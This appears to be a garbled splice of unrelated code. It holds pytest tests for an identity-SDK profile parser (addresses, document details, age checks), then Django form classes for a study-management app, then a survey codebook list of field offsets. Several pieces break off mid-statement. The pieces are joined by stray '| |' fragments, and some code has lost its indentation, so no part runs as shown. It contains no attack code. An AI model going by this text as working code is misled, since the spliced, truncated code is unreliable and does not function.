ADDRESS_FORMAT_KEY = "address_format"
ADDRESS_FORMAT_VALUE = 1  # UK format
INDIA_FORMAT_VALUE = 2
USA_FORMAT_VALUE = 3
BUILDING_NUMBER_KEY = "building_number"
BUILDING_NUMBER_VALUE = "15a"
CARE_OF_KEY = "care_of"
CARE_OF_VALUE = "S/O: Name"
STATE_KEY = "state"
INDIA_STATE_VALUE = "Punjab"
USA_STATE_VALUE = "AL"
BUILDING_KEY = "building"
BUILDING_VALUE = "House No.1111-A"
STREET_KEY = "street"
STREET_VALUE = "42nd Street"
DISTRICT_KEY = "district"
DISTRICT_VALUE = "DISTRICT 10"
SUBDISTRICT_KEY = "subdistrict"
SUBDISTRICT_VALUE = "Sub-DISTRICT 10"
POST_OFFICE_KEY = "post_office"
INDIA_POST_OFFICE_VALUE = "Rajguru Nagar"
ADDRESS_LINE_1_KEY = "address_line_1"
ADDRESS_LINE_1_VALUE = "15a North Street"
TOWN_CITY_KEY = "town_city"
TOWN_CITY_VALUE = "TOWN/CITY NAME"
POSTAL_CODE_KEY = "postal_code"
POSTAL_CODE_VALUE = "SM5 2HW"
INDIA_POSTAL_CODE_VALUE = "141012"
USA_POSTAL_CODE_VALUE = "36201"
COUNTRY_ISO_KEY = "country_iso"
COUNTRY_ISO_VALUE = "GBR"
INDIA_COUNTRY_ISO_VALUE = "IND"
USA_COUNTRY_ISO_VALUE = "USA"
COUNTRY_KEY = "country"
COUNTRY_VALUE = "UK"
INDIA_COUNTRY_VALUE = "India"
USA_COUNTRY_VALUE = "USA"
FORMATTED_ADDRESS_VALUE = "15a North Street\nCARSHALTON\nSM5 2HW\nUK"
# NOTE(review): contains "Rajgura Nagar" while INDIA_POST_OFFICE_VALUE is
# "Rajguru Nagar" — looks like a fixture typo; confirm whether intentional.
INDIA_FORMATTED_ADDRESS_VALUE = "S/O: Name\nHouse No.1111-A\n42nd Street\nTOWN/CITY NAME\nSub-DISTRICT 10\nDISTRICT 10\nPunjab\n141012\nRajgura Nagar\nIndia"
USA_FORMATTED_ADDRESS_VALUE = "15a North Street\nTOWN/CITY NAME\nAL\n36201\nUSA"
# --- document details fixtures ----------------------------------------------
USA_DOCUMENT_DETAILS = "DRIVING_LICENCE USA 12345678 2016-05-01"
INDIA_DOCUMENT_DETAILS = "DRIVING_LICENCE IND MH-05-2006-1234567 2016-05-01"
DRIVING_LICENCE = "DRIVING_LICENCE"
USA_DRIVING_LICENCE_NUMBER = "12345678"
IND_DRIVING_LICENCE_NUMBER = "MH-05-2006-1234567"
EXPIRY_DATE = "2016-05-01"
def create_single_attribute_list(name, value, anchors, content_type):
    """Return a one-element attribute list wrapping a ProtobufAttribute."""
    return [ProtobufAttribute(name, value, anchors, content_type)]
def create_attribute_list_with_selfie_field():
    """Attribute list holding a single JPEG selfie attribute."""
    return create_single_attribute_list(
        config.ATTRIBUTE_SELFIE, "base64(ง •̀_•́)ง", None, Protobuf.CT_JPEG
    )
def create_attribute_list_with_application_logo():
    """Attribute list holding a single JPEG application-logo attribute."""
    return create_single_attribute_list(
        config.ATTRIBUTE_APPLICATION_LOGO, "base64(┛ಠ_ಠ)┛彡┻━┻", None, Protobuf.CT_JPEG
    )
def create_attribute_list_with_email_field():
    """Attribute list holding a single string email attribute."""
    return create_single_attribute_list(
        config.ATTRIBUTE_EMAIL_ADDRESS, "<EMAIL>".encode(), None, Protobuf.CT_STRING
    )
def create_attribute_list_with_structured_postal_address_field(json_address_value):
    """Attribute list holding a single JSON structured-address attribute."""
    return create_single_attribute_list(
        config.ATTRIBUTE_STRUCTURED_POSTAL_ADDRESS,
        json_address_value,
        None,
        Protobuf.CT_JSON,
    )
@pytest.mark.parametrize(
    "string, expected_int", [("0", 0), ("1", 1), ("123", 123), ("-10", -10), ("-1", -1)]
)
def test_try_parse_int_value(string, expected_int):
    """CT_INT attribute bytes parse into the matching Python int."""
    name = "int_attribute"
    attributes = create_single_attribute_list(
        name=name,
        value=string.encode(),
        anchors=None,
        content_type=Protobuf.CT_INT,
    )
    parsed = Profile(attributes).get_attribute(name)
    assert parsed.value == expected_int
def test_error_parsing_attribute_has_none_value():
    """An unparseable CT_INT value is dropped from the profile."""
    name = "int_attribute"
    attributes = create_single_attribute_list(
        name=name,
        value="invalid_int".encode(),
        anchors=None,
        content_type=Protobuf.CT_INT,
    )
    # silence the expected warning about the invalid int
    logger = logging.getLogger()
    logger.propagate = False
    profile = Profile(attributes)
    logger.propagate = True
    assert profile.get_attribute(name) is None
@pytest.mark.parametrize(
    "content_type",
    [
        Protobuf.CT_DATE,
        Protobuf.CT_INT,
        Protobuf.CT_JPEG,
        Protobuf.CT_PNG,
        Protobuf.CT_JSON,
        Protobuf.CT_UNDEFINED,
    ],
)
def test_parse_empty_values_returns_none(content_type):
    """Empty payloads for non-string content types are dropped."""
    name = "attribute_name"
    attributes = create_single_attribute_list(
        name=name, value=b"", anchors=None, content_type=content_type
    )
    # silence the expected warning about the empty value
    logger = logging.getLogger()
    logger.propagate = False
    profile = Profile(attributes)
    logger.propagate = True
    assert profile.get_attribute(name) is None
@pytest.mark.parametrize("value", [b"", "".encode()])
def test_parse_empty_string_value_returns_attribute(value):
    """Empty CT_STRING values are kept, parsed as the empty string."""
    name = "attribute_name"
    attributes = create_single_attribute_list(
        name=name, value=value, anchors=None, content_type=Protobuf.CT_STRING
    )
    assert Profile(attributes).get_attribute(name).value == ""
def test_error_parsing_attribute_does_not_affect_other_attribute():
    """A bad attribute is discarded without dropping its valid siblings."""
    good_name, bad_name = "string_attribute", "int_attribute"
    good_value = "string"
    attributes = [
        ProtobufAttribute(
            name=good_name,
            value=good_value.encode(),
            anchors=None,
            content_type=Protobuf.CT_STRING,
        ),
        ProtobufAttribute(
            name=bad_name,
            value="invalid_int".encode(),
            anchors=None,
            content_type=Protobuf.CT_INT,
        ),
    ]
    # silence the expected warning about the invalid int
    logger = logging.getLogger()
    logger.propagate = False
    profile = Profile(attributes)
    logger.propagate = True
    assert len(profile.attributes) == 1
    kept = profile.get_attribute(good_name)
    assert kept.name == good_name
    assert kept.value == good_value
def test_try_parse_structured_postal_address_uk():
    """UK-format structured addresses round-trip through the profile."""
    address = {
        ADDRESS_FORMAT_KEY: ADDRESS_FORMAT_VALUE,
        BUILDING_NUMBER_KEY: BUILDING_NUMBER_VALUE,
        ADDRESS_LINE_1_KEY: ADDRESS_LINE_1_VALUE,
        TOWN_CITY_KEY: TOWN_CITY_VALUE,
        POSTAL_CODE_KEY: POSTAL_CODE_VALUE,
        COUNTRY_ISO_KEY: COUNTRY_ISO_VALUE,
        COUNTRY_KEY: COUNTRY_VALUE,
        config.KEY_FORMATTED_ADDRESS: FORMATTED_ADDRESS_VALUE,
    }
    profile = Profile(
        create_attribute_list_with_structured_postal_address_field(
            json.dumps(address).encode()
        )
    )
    parsed = profile.structured_postal_address.value
    assert type(parsed) is collections.OrderedDict
    # every submitted field must survive the round trip unchanged
    for key, expected in address.items():
        assert parsed[key] == expected
def test_other_json_type_is_parsed():
    """Arbitrary CT_JSON attributes are decoded into ordered dicts."""
    name = "other_json"
    payload = {"keyA": "valueA", "keyB": "valueB"}
    attributes = create_single_attribute_list(
        name=name,
        value=json.dumps(payload).encode(),
        anchors=None,
        content_type=Protobuf.CT_JSON,
    )
    fetched = Profile(attributes).get_attribute(name)
    assert fetched.name == name
    assert type(fetched.value) is collections.OrderedDict
    for key, expected in payload.items():
        assert fetched.value[key] == expected
def test_try_parse_structured_postal_address_india():
    """India-format structured addresses round-trip through the profile."""
    address = {
        ADDRESS_FORMAT_KEY: INDIA_FORMAT_VALUE,
        CARE_OF_KEY: CARE_OF_VALUE,
        BUILDING_KEY: BUILDING_VALUE,
        STREET_KEY: STREET_VALUE,
        TOWN_CITY_KEY: TOWN_CITY_VALUE,
        SUBDISTRICT_KEY: SUBDISTRICT_VALUE,
        DISTRICT_KEY: DISTRICT_VALUE,
        STATE_KEY: INDIA_STATE_VALUE,
        POSTAL_CODE_KEY: INDIA_POSTAL_CODE_VALUE,
        POST_OFFICE_KEY: INDIA_POST_OFFICE_VALUE,
        COUNTRY_ISO_KEY: INDIA_COUNTRY_ISO_VALUE,
        COUNTRY_KEY: INDIA_COUNTRY_VALUE,
        config.KEY_FORMATTED_ADDRESS: INDIA_FORMATTED_ADDRESS_VALUE,
    }
    profile = Profile(
        create_attribute_list_with_structured_postal_address_field(
            json.dumps(address).encode()
        )
    )
    parsed = profile.structured_postal_address.value
    assert type(parsed) is collections.OrderedDict
    # every submitted field must survive the round trip unchanged
    for key, expected in address.items():
        assert parsed[key] == expected
def test_try_parse_structured_postal_address_usa():
    """USA-format structured addresses round-trip through the profile."""
    address = {
        ADDRESS_FORMAT_KEY: USA_FORMAT_VALUE,
        ADDRESS_LINE_1_KEY: ADDRESS_LINE_1_VALUE,
        TOWN_CITY_KEY: TOWN_CITY_VALUE,
        STATE_KEY: USA_STATE_VALUE,
        POSTAL_CODE_KEY: USA_POSTAL_CODE_VALUE,
        COUNTRY_ISO_KEY: USA_COUNTRY_ISO_VALUE,
        COUNTRY_KEY: USA_COUNTRY_VALUE,
        config.KEY_FORMATTED_ADDRESS: USA_FORMATTED_ADDRESS_VALUE,
    }
    profile = Profile(
        create_attribute_list_with_structured_postal_address_field(
            json.dumps(address).encode()
        )
    )
    parsed = profile.structured_postal_address.value
    assert type(parsed) is collections.OrderedDict
    # every submitted field must survive the round trip unchanged
    for key, expected in address.items():
        assert parsed[key] == expected
def test_try_parse_structured_postal_address_nested_json():
    """Nested JSON inside formatted_address survives parsing intact."""
    formatted_address_json = {
        "item1": [[1, "a1"], [2, "a2"]],
        "item2": [[3, "b3"], [4, "b4"]],
    }
    address = {
        ADDRESS_FORMAT_KEY: ADDRESS_FORMAT_VALUE,
        BUILDING_NUMBER_KEY: BUILDING_NUMBER_VALUE,
        ADDRESS_LINE_1_KEY: ADDRESS_LINE_1_VALUE,
        TOWN_CITY_KEY: TOWN_CITY_VALUE,
        POSTAL_CODE_KEY: POSTAL_CODE_VALUE,
        COUNTRY_ISO_KEY: COUNTRY_ISO_VALUE,
        COUNTRY_KEY: COUNTRY_VALUE,
        config.KEY_FORMATTED_ADDRESS: formatted_address_json,
    }
    profile = Profile(
        create_attribute_list_with_structured_postal_address_field(
            json.dumps(address).encode()
        )
    )
    parsed = profile.structured_postal_address.value
    assert type(parsed) is collections.OrderedDict
    # every submitted field must survive the round trip unchanged
    for key, expected in address.items():
        assert parsed[key] == expected
def test_set_address_to_be_formatted_address():
    """postal_address falls back to the structured formatted_address field."""
    address = {config.KEY_FORMATTED_ADDRESS: FORMATTED_ADDRESS_VALUE}
    profile = Profile(
        create_attribute_list_with_structured_postal_address_field(
            json.dumps(address).encode()
        )
    )
    assert profile.postal_address.value == FORMATTED_ADDRESS_VALUE
def test_document_images():
    """The document_images multi-value parses into its two JPEGs."""
    attribute = attribute_fixture_parser.get_attribute_from_base64_text(
        attribute_fixture_parser.ATTRIBUTE_DOCUMENT_IMAGES
    )
    images = Profile([attribute]).document_images
    assert len(images.value) == 2
    expected = [("jpeg", "vWgD//2Q=="), ("jpeg", "38TVEH/9k=")]
    for image, (mime, tail) in zip(images.value, expected):
        image_helper.assert_is_expected_image(image, mime, tail)
def test_nested_multi_value():
    """Multi-values nested in an outer tuple keep structure and images."""
    name = "nested_multi_value"
    inner = attribute_fixture_parser.parse_multi_value()
    profile = Profile(profile_attributes=None)
    profile.attributes[name] = Attribute(name=name, value=(inner,), anchors=None)
    fetched = profile.get_attribute(name)
    assert isinstance(fetched.value, tuple)
    for item in fetched.value:
        assert isinstance(item, tuple)
    image_helper.assert_is_expected_image(fetched.value[0][0], "jpeg", "vWgD//2Q==")
    image_helper.assert_is_expected_image(fetched.value[0][1], "jpeg", "38TVEH/9k=")
def test_get_attribute_document_images():
    """get_attribute and the document_images property agree."""
    attributes = create_single_attribute_list(
        name=config.ATTRIBUTE_DOCUMENT_IMAGES,
        value=[],
        anchors=None,
        content_type=Protobuf.CT_MULTI_VALUE,
    )
    profile = Profile(attributes)
    assert profile.document_images == profile.get_attribute(
        config.ATTRIBUTE_DOCUMENT_IMAGES
    )
def test_get_attribute_selfie():
    """get_attribute and the selfie property agree."""
    profile = Profile(create_attribute_list_with_selfie_field())
    assert profile.selfie == profile.get_attribute(config.ATTRIBUTE_SELFIE)
def test_get_attribute_email_address():
    """get_attribute and the email_address property agree."""
    profile = Profile(create_attribute_list_with_email_field())
    assert profile.email_address == profile.get_attribute(
        config.ATTRIBUTE_EMAIL_ADDRESS
    )
def test_get_attribute_returns_none():
    """Missing attributes come back as None."""
    assert Profile(None).get_attribute(config.ATTRIBUTE_SELFIE) is None
def test_get_document_details_usa():
    """A USA document-details string parses into its component fields."""
    attributes = create_single_attribute_list(
        name=config.ATTRIBUTE_DOCUMENT_DETAILS,
        value=USA_DOCUMENT_DETAILS.encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    document = Profile(attributes).document_details.value
    assert document.document_type == DRIVING_LICENCE
    assert document.issuing_country == USA_COUNTRY_ISO_VALUE
    assert document.document_number == USA_DRIVING_LICENCE_NUMBER
    assert document.expiration_date.isoformat() == EXPIRY_DATE
def test_get_document_details_india():
    """An India document-details string parses into its component fields."""
    attributes = create_single_attribute_list(
        name=config.ATTRIBUTE_DOCUMENT_DETAILS,
        value=INDIA_DOCUMENT_DETAILS.encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    document = Profile(attributes).document_details.value
    assert document.document_type == DRIVING_LICENCE
    assert document.issuing_country == INDIA_COUNTRY_ISO_VALUE
    assert document.document_number == IND_DRIVING_LICENCE_NUMBER
    assert document.expiration_date.isoformat() == EXPIRY_DATE
def test_create_application_profile_with_name():
    """The application_name property mirrors get_attribute lookup."""
    attributes = create_single_attribute_list(
        name=config.ATTRIBUTE_APPLICATION_NAME,
        value="yoti-sdk-test".encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    app_profile = ApplicationProfile(attributes)
    assert isinstance(app_profile, ApplicationProfile)
    assert app_profile.application_name == app_profile.get_attribute(
        config.ATTRIBUTE_APPLICATION_NAME
    )
def test_create_application_profile_with_url():
    """The application_url property mirrors get_attribute lookup."""
    attributes = create_single_attribute_list(
        name=config.ATTRIBUTE_APPLICATION_URL,
        value="https://yoti.com".encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    app_profile = ApplicationProfile(attributes)
    assert isinstance(app_profile, ApplicationProfile)
    assert app_profile.application_url == app_profile.get_attribute(
        config.ATTRIBUTE_APPLICATION_URL
    )
def test_create_application_profile_with_receipt_bgcolor():
    """The receipt background-color property mirrors get_attribute lookup."""
    attributes = create_single_attribute_list(
        name=config.ATTRIBUTE_APPLICATION_RECEIPT_BGCOLOR,
        value="#FFFFFF".encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    app_profile = ApplicationProfile(attributes)
    assert isinstance(app_profile, ApplicationProfile)
    assert app_profile.application_receipt_bg_color == app_profile.get_attribute(
        config.ATTRIBUTE_APPLICATION_RECEIPT_BGCOLOR
    )
def test_create_application_profile_with_logo():
    """The application logo parses into an Image and mirrors get_attribute."""
    app_profile = ApplicationProfile(create_attribute_list_with_application_logo())
    logo = app_profile.application_logo
    assert isinstance(app_profile, ApplicationProfile)
    assert isinstance(logo.value, Image)
    assert logo == app_profile.get_attribute(config.ATTRIBUTE_APPLICATION_LOGO)
@pytest.mark.parametrize(
    "attribute_value,expected_age_over,expected_value",
    [("true", 18, True), ("true", 21, True), ("false", 18, False)],
)
def test_get_age_over_verification(attribute_value, expected_age_over, expected_value):
    """An age_over:N attribute yields one AgeVerification with the parsed result.

    Fix: removed a leftover debug `print(human_profile.attributes)` that
    polluted test output.
    """
    attribute_list = create_single_attribute_list(
        name=config.ATTRIBUTE_AGE_OVER + str(expected_age_over),
        value=attribute_value.encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    human_profile = Profile(attribute_list)
    age_verifications = human_profile.get_age_verifications()
    age_verification = human_profile.find_age_over_verification(expected_age_over)
    assert len(age_verifications) == 1
    assert isinstance(age_verification, AgeVerification)
    assert age_verification.result is expected_value
@pytest.mark.parametrize(
    "attribute_value,expected_age_under,expected_value",
    [("true", 18, True), ("true", 21, True), ("false", 18, False)],
)
def test_get_age_under_verification(
    attribute_value, expected_age_under, expected_value
):
    """An age_under:N attribute yields one AgeVerification with the parsed result.

    Fix: removed a leftover debug `print(human_profile.attributes)` that
    polluted test output.
    """
    attribute_list = create_single_attribute_list(
        name=config.ATTRIBUTE_AGE_UNDER + str(expected_age_under),
        value=attribute_value.encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    human_profile = Profile(attribute_list)
    age_verifications = human_profile.get_age_verifications()
    age_verification = human_profile.find_age_under_verification(expected_age_under)
    assert len(age_verifications) == 1
    assert isinstance(age_verification, AgeVerification)
    assert age_verification.result is expected_value
def test_get_age_verifications():
    """A single age_under attribute produces exactly one verification."""
    attributes = create_single_attribute_list(
        name=config.ATTRIBUTE_AGE_UNDER + str(18),
        value="true".encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    assert len(Profile(attributes).get_age_verifications()) == 1
def test_expect_none_when_no_age_over_verification_exists():
    """find_age_over_verification returns None without age attributes.

    Fix: encode the CT_STRING fixture value — every other CT_STRING fixture
    in this module passes bytes, and this one passed a bare str.
    """
    attribute_list = create_single_attribute_list(
        name=config.ATTRIBUTE_GIVEN_NAMES,
        value="Jenny".encode(),
        anchors=None,
        content_type=Protobuf.CT_STRING,
    )
    human_profile = Profile(attribute_list)
    assert human_profile.find_age_over_verification(18) is None
def test_expect_none_when_no_age_under_verification_exists():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_GIVEN_NAMES,
value="Jenny",
anchors=None,
content_type=Protobuf.CT_STRING,
| |
None)
super().__init__(*args, **kwargs)
# self.fields exists after super.__init__()
if self._user:
# make sure lines are in a readable study
access = models.Study.access_filter(self._user, via="study")
queryset = models.Line.objects.filter(access).distinct()
self.fields["lineId"].queryset = queryset
def clean(self):
    """Default the contact to the requesting user when none was chosen."""
    super().clean()
    # TODO: handle contact_extra too
    contact = self.cleaned_data.get("contact", None)
    if not contact:
        self.cleaned_data["contact"] = self._user
def save(self, commit=True, *args, **kwargs):
    """Save the study and apply permissions atomically.

    Grants the creator WRITE permission, applies any configured default
    group READ permissions, and copies the selected lines onto the new
    study (see save_lines).
    """
    # perform updates atomically to the study and related user permissions
    with transaction.atomic():
        # save the study
        s = super().save(commit=commit, *args, **kwargs)
        # make sure the creator has write permission
        # NOTE(review): a previous comment also mentioned an "ESE read"
        # grant, but only the creator WRITE grant is made here — confirm.
        s.userpermission_set.update_or_create(
            user=s.created.mod_by, permission_type=StudyPermission.WRITE
        )
        # if configured, apply default group read permissions to the new study
        _SETTING_NAME = "EDD_DEFAULT_STUDY_READ_GROUPS"
        default_group_names = getattr(settings, _SETTING_NAME, None)
        if default_group_names:
            default_groups = Group.objects.filter(name__in=default_group_names)
            default_groups = default_groups.values_list("pk", flat=True)
            requested_groups = len(default_group_names)
            found_groups = len(default_groups)
            # log (but continue) when some configured group names don't exist
            if requested_groups != found_groups:
                logger.error(
                    f"Setting only {found_groups} of {requested_groups} read permissions "
                    f"for study `{s.slug}`."
                )
                logger.error(
                    f"Check that all group names set in the `{_SETTING_NAME}` value in "
                    "Django settings is valid."
                )
            for group in default_groups:
                s.grouppermission_set.update_or_create(
                    group_id=group,
                    defaults={"permission_type": StudyPermission.READ},
                )
        # create copies of passed in Line IDs
        self.save_lines(s)
    return s
def save_lines(self, study):
    """Attach fresh copies of the form's selected lines to *study*."""
    selected = self.cleaned_data.get("lineId", None)
    copies = []
    if selected is not None:
        for line in selected:
            # clearing pk/id/uuid makes Django insert a brand-new row
            line.pk = line.id = None
            line.uuid = None
            line.study = study
            line.study_id = study.id
            copies.append(line)
    study.line_set.add(*copies, bulk=False)
class CreateAttachmentForm(forms.ModelForm):
    """Form collecting a file upload plus description for an EDDObject."""

    class Meta:
        model = Attachment
        fields = ("file", "description")
        labels = {"file": _(""), "description": _("Description")}
        help_texts = {"description": _(""), "file": _("")}
        widgets = {"description": forms.widgets.TextInput()}

    def __init__(self, *args, **kwargs):
        # no colon suffix on field labels
        kwargs.setdefault("label_suffix", "")
        # the EDDObject the new attachment will be linked to
        self._parent = kwargs.pop("edd_object", None)
        super().__init__(*args, **kwargs)

    def save(self, commit=True, *args, **kwargs):
        """Link the new attachment to the parent object before saving."""
        attachment = super().save(commit=False, *args, **kwargs)
        attachment.object_ref = self._parent
        if commit:
            attachment.save()
        return attachment
class CreateCommentForm(forms.ModelForm):
    """Form collecting a comment body for an EDDObject."""

    class Meta:
        model = Comment
        fields = ("body",)
        labels = {"body": _("")}
        help_texts = {"body": _("")}

    def __init__(self, *args, **kwargs):
        # no colon suffix on field labels
        kwargs.setdefault("label_suffix", "")
        # the EDDObject the new comment will be linked to
        self._parent = kwargs.pop("edd_object", None)
        super().__init__(*args, **kwargs)

    def save(self, commit=True, *args, **kwargs):
        """Link the new comment to the parent object before saving."""
        comment = super().save(commit=False, *args, **kwargs)
        comment.object_ref = self._parent
        if commit:
            comment.save()
        return comment
class BulkEditMixin:
    """Mixin adding bulk-edit checkbox handling to model forms."""

    @classmethod
    def initial_from_model(cls, instance, prefix=None):
        """Build a dict of initial form values from a model instance."""
        initial = {}
        for fieldname in cls._meta.fields:
            widget = cls._meta.widgets.get(fieldname, None)
            value = getattr(instance, fieldname)
            fieldkey = f"{prefix}-{fieldname}" if prefix else fieldname
            if isinstance(widget, forms.widgets.MultiWidget):
                # MultiWidget values must be split into per-subwidget keys
                for i, part in enumerate(widget.decompress(value)):
                    initial[f"{fieldkey}_{i}"] = part
            elif isinstance(value, dict):
                # JSONField yields a dict; serialize back to JSON text
                initial[fieldkey] = json.dumps(value)
            else:
                initial[fieldkey] = str(value)
        return initial

    def check_bulk_edit(self):
        """Drop fields whose bulk-edit checkbox was not submitted."""
        unchecked = [
            field.name
            for field in self.visible_fields()
            if self.add_prefix(f"_bulk_{field.name}") not in self.data
        ]
        for fieldname in unchecked:
            # removing the field keeps it from being processed/saved
            del self.fields[fieldname]

    def inject_bulk_checkboxes(self):
        """Prefix every field label with a bulk-edit checkbox (hidden via CSS)."""
        for fieldname, field in self.fields.items():
            bulkname = self.add_prefix(f"_bulk_{fieldname}")
            field.label = mark_safe(
                f'<input type="checkbox" class="bulk" name="{bulkname}" '
                f'checked="checked" value=""/>{field.label}'
            )
class MetadataEditMixin:
    """Mixin adding MetadataType value processing to forms."""

    def clean_metadata(self):
        """Merge submitted metadata into the instance's existing metadata."""
        raw = self.cleaned_data.get("metadata", None)
        updating, removing = self.process_metadata_inputs(
            {} if raw is None else raw
        )
        if not self.is_editing():
            # creating a new object: only the submitted values apply
            return updating
        merged = dict(self.instance.metadata)
        merged.update(updating)
        for key in removing:
            merged.pop(key, None)
        return merged

    def is_editing(self):
        """Truthy when the form is bound to an already-saved instance."""
        return self.instance and self.instance.pk is not None

    def process_metadata_inputs(self, meta):
        """Split raw metadata input into values to set and keys to delete.

        :returns: a 2-tuple of (dict of metadata values to update,
            set of metadata keys to remove).
        """
        updating, removing = {}, set()
        for key, value in meta.items():
            if value is None:
                # treat None/null/undefined as empty string
                updating[key] = ""
            elif isinstance(value, dict) and "delete" in value:
                # a dict containing a "delete" key marks the value for removal
                removing.add(key)
            else:
                # everything else passes through verbatim
                updating[key] = value
        return updating, removing
class LineForm(BulkEditMixin, MetadataEditMixin, forms.ModelForm):
    """ Form to create/edit a line. """

    class Meta:
        model = Line
        # editable Line fields exposed by this form
        fields = (
            "name",
            "description",
            "control",
            "contact",
            "experimenter",
            "strains",
            "metadata",
        )
        labels = {
            "name": _("Line Name"),
            "description": _("Description"),
            "control": _("Is Control?"),
            "contact": _("Contact"),
            "experimenter": _("Experimenter"),
            "strains": _("Strains"),
        }
        widgets = {
            "name": forms.TextInput(
                attrs={"class": "form-control", "placeholder": "(required)"}
            ),
            "description": forms.Textarea(attrs={"rows": 2, "class": "form-control "}),
            "control": forms.widgets.CheckboxInput(attrs={"class": "form-control"}),
            "contact": UserAutocompleteWidget(),
            "experimenter": UserAutocompleteWidget(),
            "strains": MultiRegistryAutocompleteWidget(),
            "metadata": HiddenJSONWidget(),
        }
        help_texts = {
            "name": _(""),
            "description": _(""),
            "control": _(""),
            "contact": _(""),
            "experimenter": _(""),
            "strains": _(""),
        }

    def __init__(self, *args, **kwargs):
        # removes default hard-coded suffix of colon character on all labels
        kwargs.setdefault("label_suffix", "")
        # store the parent Study
        self._study = kwargs.pop("study", None)
        super().__init__(*args, **kwargs)
        # alter all fields to include a "bulk-edit" checkbox in label
        self.inject_bulk_checkboxes()
        # make sure strain is keyed by registry_id instead of pk, and validates uuid
        self._tweak_strains_field()

    def _tweak_strains_field(self):
        # make sure strain is keyed by registry_id instead of pk, and validates uuid
        def __clean(self, value):
            # validator creates Strain record if missing, now can check value
            for v in value:
                self.run_validators(v)
            # NOTE: private name mangling turns __clean into _LineForm__clean
            # both here and in the attribute assignment below, so this calls
            # the ORIGINAL clean saved on the field — not infinite recursion.
            return self.__clean(value)

        strains_field = self.fields["strains"]
        # stash the original clean (mangled to _LineForm__clean) and replace
        # it with the wrapper above, bound to the field via partial
        strains_field.__clean = strains_field.clean
        strains_field.clean = partial(__clean, strains_field)
        strains_field.to_field_name = "registry_id"
        strains_field.validators = [RegistryValidator().validate]

    def clean(self):
        super().clean()
        # if no explicit experimenter is set, make the study contact the experimenter
        if not self.cleaned_data.get("experimenter", None):
            if self._study.contact:
                self.cleaned_data["experimenter"] = self._study.contact

    def save(self, commit=True, *args, **kwargs):
        # always save with commit=False first so the study FK can be set
        line = super().save(commit=False, *args, **kwargs)
        line.study_id = self._study.pk
        if commit:
            line.save()
            # since we forced commit=False in the first save, need to explicitly call save_m2m
            self.save_m2m()
        return line
class AssayForm(BulkEditMixin, MetadataEditMixin, forms.ModelForm):
""" Form to create/edit an assay. """
# allow auto-generation of name by override auto-created name field required kwarg
name = forms.CharField(
help_text=_(
"If left blank, a name in form [Line]-[Protocol]-[#] will be generated."
),
label=_("Name"),
max_length=255,
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}),
)
# order the options in the default SELECT widget; remove when using AutocompleteWidget
protocol = forms.ModelChoiceField(
label=_("Protocol"),
queryset=Protocol.objects.order_by("name"),
required=True,
# TODO add a ProtocolAutocompleteWidget instead of building a SELECT
widget=forms.Select(attrs={"class": "form-control"}),
)
class Meta:
model = Assay
fields = ("name", "description", "protocol", "experimenter", "metadata")
labels = {"description": _("Description"), "experimenter": _("Experimenter")}
help_texts = {"description": _(""), "experimenter": _("")}
widgets = {
"description": forms.Textarea(attrs={"rows": 2, "class": "form-control"}),
"experimenter": UserAutocompleteWidget(),
"metadata": HiddenJSONWidget(),
}
    def __init__(self, *args, **kwargs):
        """Accepts extra "lines" and "study" kwargs naming the parent objects.

        ``lines`` is a queryset of parent Line objects; when non-empty,
        ``save()`` creates one Assay per Line. ``study`` is the parent Study.
        """
        # removes default hard-coded suffix of colon character on all labels
        kwargs.setdefault("label_suffix", "")
        # store the parent Lines
        self._lines = kwargs.pop("lines", models.Line.objects.none())
        # store the parent Study
        self._study = kwargs.pop("study", None)
        super().__init__(*args, **kwargs)
        # alter all fields to include a "bulk-edit" checkbox in label
        self.inject_bulk_checkboxes()
def save(self, commit=True, *args, **kwargs):
assay = super().save(commit=False, *args, **kwargs)
assay.study_id = self._study.pk
if commit:
if not self._lines.exists():
# when self._lines is empty, proceed normally for single ID
assay.save()
self.save_m2m()
else:
# when self._lines is set, Assay objects get created for each item
def link_to_line(line_id):
clone = deepcopy(assay)
clone.line_id = line_id
return clone
def save_linked(enum):
# caller passes linked iterator through enumerate, unpack the tuple
index = enum[0]
assay = enum[1]
assay.save()
if not assay.name:
# once saved, can update with | |
33891, 33892 ),
"DR15aYrCl_4" : ( 33892, 33893 ),
"DR16YrCl_4" : ( 33893, 33894 ),
"DR17YrCl_4" : ( 33894, 33895 ),
"DR5MnthCl_4" : ( 33895, 33896 ),
"DR6MnthCl_4" : ( 33896, 33897 ),
"DR7MnthCl_4" : ( 33897, 33898 ),
"DR7aMnthCl_4" : ( 33898, 33899 ),
"DR7bMnthCl_4" : ( 33899, 33900 ),
"DR8MnthCl_4" : ( 33900, 33901 ),
"DR9aMnthCl_4" : ( 33901, 33902 ),
"DR10MnthCl_4" : ( 33902, 33903 ),
"DR11bMnthCl_4" : ( 33903, 33904 ),
"DR11e2MnthCl_4" : ( 33904, 33905 ),
"DR12a2MnthCl_4" : ( 33905, 33906 ),
"DR12b1MnthCl_4" : ( 33906, 33907 ),
"DR12c1MnthCl_4" : ( 33907, 33908 ),
"DR13dMnthCl_4" : ( 33908, 33909 ),
"DR14bMnthCl_4" : ( 33909, 33910 ),
"DR18aMnthCl_4" : ( 33910, 33911 ),
"DR15aMnthCl_4" : ( 33911, 33912 ),
"DR16MnthCl_4" : ( 33912, 33913 ),
"DR17MnthCl_4" : ( 33913, 33914 ),
"DR19AgeOns_4" : ( 33914, 33916 ),
"DR19Ons_4" : ( 33916, 33917 ),
"DR19AgeRec_4" : ( 33917, 33919 ),
"DR19Rec_4" : ( 33919, 33920 ),
"DRSxCount4" : ( 33920, 33922 ),
"DRYrClCount4" : ( 33922, 33924 ),
"DRMnthClCount4" : ( 33924, 33926 ),
"DR19Qsx77" : ( 33926, 33927 ),
"DR19Qsx78" : ( 33927, 33928 ),
"DR19Qsx79" : ( 33928, 33929 ),
"DR19Qsx80" : ( 33929, 33930 ),
"DR19Qsx81" : ( 33930, 33931 ),
"DR19Qsx82" : ( 33931, 33932 ),
